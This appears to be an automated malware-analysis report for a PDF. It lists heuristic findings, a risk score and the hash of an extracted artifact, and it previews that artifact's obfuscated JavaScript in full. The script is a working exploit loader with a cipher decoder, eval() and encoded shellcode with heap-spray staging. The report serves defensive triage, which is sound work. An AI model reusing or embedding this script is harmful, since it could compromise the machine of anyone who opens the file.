MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_EVAL heuristic firing suggests that the JavaScript is obfuscated and uses an eval() call, a common technique for hiding malicious code. The extracted artifact 'javascript_obj0007_000.js' is also flagged for script obfuscation. The likely intent is to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
Nxe{AWr = ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x237 | 8083 bytes |
SHA-256: 3726e00e5374640508f25f806a2113640a6187a274ff46f64ca9ee4f9830e31f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 74 of 113 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function B7RQ0JRsvvAz7zge5(B7RQ0JRsvvAz7zge5,AL7bi9GJbXsyLuvd) {var A93WsshcdAeF=B7RQ0JRsvvAz7zge5. substr (AL7bi9GJbXsyLuvd, 1);return A93WsshcdAeF;}/*xZB1uO358aBd1S5|IYsISF0AmTdnxjQk|RctgWpfwr8o94YISGQlL*/function Al2nKJ6fNmZkrWTIpq(sBimEtTv) {/*lyaFcN|synARXgnDBauAEu|c3NjKyvRakrgC4Kvtyw*/var N4yMgq0rzxMCalnH86Qn = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*MToQV[AVJvQm]eMyT7FtiwQlraWa*//*JbccFsxJt|SeZ4J4G|NED7nzNOhol84uZWMeFA*/var dVpB8tuSetfZhs6 /*yJ6Ti1cc8ZqDdnq[A40fgyZQN]dr1eVpnS8MKaoI0VL*/= new String("nKpZEJ Rgm>heUT2w)8v9YG7zCaf,S5HxD4Bt3MWs0(bQqk<u6cPFjroOid1NX}ALI{lyV.");/*A2mzxdVTRu|fgENXijDL1BXBc|KTXVn*/for(inDWzFwb=0;inDWzFwb<N4yMgq0rzxMCalnH86Qn.length;inDWzFwb++) {if(sBimEtTv == B7RQ0JRsvvAz7zge5(dVpB8tuSetfZhs6, inDWzFwb)) {/*OQMBthUBS4[y8tMhSPsKRFLt]WDfsr26*/return B7RQ0JRsvvAz7zge5(N4yMgq0rzxMCalnH86Qn, inDWzFwb);/*F7rmRs5MOuL86sRLabdg <No9QKr7Dn5Ikmv2]qFkaQiW9zi*/}}return sBimEtTv;}/*RB64Ol3fwld[OY7zBtrWZw6zDeMCUv]lwYfBAZgwAAm*//*YkEZTwvt|simNvoigHJTgpU|F1TF16VQhZp0L*/var lmSUX = new String;var UNCKug = new String("\nOBF P<k8W9Hjrs9o5FIU = uWi mFFB1pZ;\nOBF tL7.Qfv>XkVq>qy1;\nsou3rb6u 2F)>h6{y,C}Nw{eypitTPIBAe9XdHr{SCg ou3.t0UlyT{G8wSCZE\n i(bkW pitTPIBAe9XdHr{SCRkWu0r( * A n ou3.t0UlyT{G8wSCZE\n itTPIBAe9XdHr{SC += itTPIBAe9XdHr{SC;\n J\n itTPIBAe9XdHr{SC = itTPIBAe9XdHr{SCRjotjrFbu0pXg ou3.t0UlyT{G8wSC / AZ;\n FWroFu itTPIBAe9XdHr{SC;\nJ\nsou3rb6u 4Qwdv8msfVhYh(uVpPzTllSmhqTBIH{SCZE\n OBF 2<G.lx6Ds}oF(b1> = XdX3X3X3X3;\n OBF cUweQaz,(Nxe{AWr = ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n bs pPzTllSmhqTBIH{SC == }ZE\n 2<G.lx6Ds}oF(b1> = XdLXLXLXLX;\n cUweQaz,(Nxe{AWr = ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n J\n WkjW bs pPzTllSmhqTBIH{SC == AZE\n cUweQaz,(Nxe{AWr = ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n J\n OBF zAArDcaeP9lx{{b> = XdIXXXXX;\n OBF >N7La65.6LYj{}kj = cUweQaz,(Nxe{AWrRkWu0r( * A;\n OBF ou3.t0UlyT{G8wSC = zAArDcaeP9lx{{b> - p>N7La65.6LYj{}kj + XdLVZ;\n OBF itTPIBAe9XdHr{SC = ouWj3BcWp\"%o.X.X%o.X.X\"Z;\n itTPIBAe9XdHr{SC = 2F)>h6{y,C}Nw{eypitTPIBAe9XdHr{SCg ou3.t0UlyT{G8wSCZ;\n OBF <ukBMh6,Dr}3dQ62 = p2<G.lx6Ds}oF(b1> - XdIXXXXXZ / zAArDcaeP9lx{{b>;\n s6F pOBF ze8>A68PF0Qi(S6Q = X; ze8>A68PF0Qi(S6Q n <ukBMh6,Dr}3dQ62; ze8>A68PF0Qi(S6Q ++ ZE\n P<k8W9Hjrs9o5FIU[ze8>A68PF0Qi(S6Q] = itTPIBAe9XdHr{SC + cUweQaz,(Nxe{AWr;\n J\nJ\nsou3rb6u mB8Ou.7YLzN}XuwjpZE\n OBF 0BILzGr2I3eqVL,z = X;\n OBF ju9Ciq<1XkN)42>B = BccRObWiWF5WFjb6uRr6frFbu0pZ;\n BccR3kWBF,b<W7orptL7.Qfv>XkVq>qy1Z;\n\n bs pju9Ciq<1XkN)42>B n yR}ZE\n 4Qwdv8msfVhYh(uVpXZ;\n OBF kUMT3HHs.QC2kos7 = ouWj3BcWp\"%oX3X3%oX3X3\"Z;\n i(bkW pkUMT3HHs.QC2kos7RkWu0r( n II.{AZkUMT3HHs.QC2kos7 += kUMT3HHs.QC2kos7;\n r(bj R36kkBtfr6FW = h6kkBtR36kkW3rU<Bbk)us6pE\n jotQ : \"\"g <j0 : kUMT3HHs.QC2kos7\n J\n Z;\n J\nbs pju9Ciq<1XkN)42>B K= .ZE\n rF1 E\nbs pBccRM63Rh6kkBtR0Wr)36uZE\n 4Qwdv8msfVhYh(uVpAZ;\n OBF (}6WkBMOY3UOrzHQ = ouWj3BcWp\"%X.\"Z;\n i(bkW p(}6WkBMOY3UOrzHQRkWu0r( n XdIXXXZ(}6WkBMOY3UOrzHQ += (}6WkBMOY3UOrzHQ;\n (}6WkBMOY3UOrzHQ = \"GR\" + (}6WkBMOY3UOrzHQ;\nBccRM63Rh6kkBtR0Wr)36up(}6WkBMOY3UOrzHQZ;\n 0BILzGr2I3eqVL,z = };\n J\n WkjW E\n 0BILzGr2I3eqVL,z = };\n J\n J\n 3Br3( pWZE\n 0BILzGr2I3eqVL,z = };\n J\n bs p0BILzGr2I3eqVL,z == }ZE\n bs ppju9Ciq<1XkN)42>B K= yR}&& ju9Ciq<1XkN)42>B n .ZZE\n 4Qwdv8msfVhYh(uVp}Z;\n OBF uXN205i6TY{AwqzN = \"}A..................\";\n s6F pcUWHcwahosVulWxQ = X; cUWHcwahosVulWxQ n Ayl; cUWHcwahosVulWxQ ++ ZE\n uXN205i6TY{AwqzN += \"V\";\n J\n orbkRcFbursp\"%I{XXXs\"g uXN205i6TY{AwqzNZ;\n J\n J\n J\nJ\nBccR1H},Li))8G8B.QBo = mB8Ou.7YLzN}Xuwj;\ntL7.Qfv>XkVq>qy1 = BccRjWr,b<W7orp\"BccR1H},Li))8G8B.QBopZ\"g }XZ;\n");/*jvKIXX4C5aJF{quEN05g6xdRDAqt1}KbnUjBseDn4Nsn3dsGU*//*nQbHheHON8GYaut|vbezE|CxC6RuDlYq1*/for(ebRc20=0;ebRc20<UNCKug.length;ebRc20++)lmSUX += Al2nKJ6fNmZkrWTIpq(B7RQ0JRsvvAz7zge5(UNCKug,ebRc20));eval(lmSUX);/*yZU5nh4u5UepUPGyEL[H9PDQAG2]xtOlJihwGbg*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.